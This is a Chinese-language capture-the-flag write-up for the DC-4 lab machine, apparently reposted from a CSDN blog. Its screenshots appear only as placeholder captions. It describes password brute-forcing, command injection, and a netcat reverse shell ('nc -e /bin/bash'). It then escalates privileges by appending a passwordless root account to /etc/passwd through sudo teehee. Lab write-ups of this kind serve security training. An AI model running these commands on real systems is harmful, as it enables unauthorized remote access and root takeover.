靶机测试--DC(4)

信息收集

主机发现

在这里插入图片描述

端口扫描

在这里插入图片描述

漏洞发现及利用

访问80:
在这里插入图片描述
一个登录框,还给出了用户名admin。爆破密码:happy;登录。

一个可以执行命令的页面:
在这里插入图片描述
抓包,进行修改:
在这里插入图片描述
存在命令执行漏洞。

反弹shell

nc -e /bin/bash ip地址 端口

在home目录下发现三个用户:

依次打开这三个目录:
只有jim目录下有文件:
在这里插入图片描述

打开后发现:
在这里插入图片描述
打开文件,可能是个密码文件。

使用hydra进行ssh爆破:

在这里插入图片描述

使用ssh进行连接:

在这里插入图片描述

提权

在/var/mail/目录下有一封邮件,打开:
在这里插入图片描述
得到了charles的账号密码。

切换到该用户,查看可以执行的sudo 命令:
在这里插入图片描述

teehee -a 可以在一个文件中追加内容,使用:

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

添加root权限的用户到/etc/passwd,密码为空。

切换用户:
在这里插入图片描述
在这里插入图片描述

总结

新知识:teehee提权方法。

猜你喜欢

转载自blog.csdn.net/qq_45742511/article/details/115013298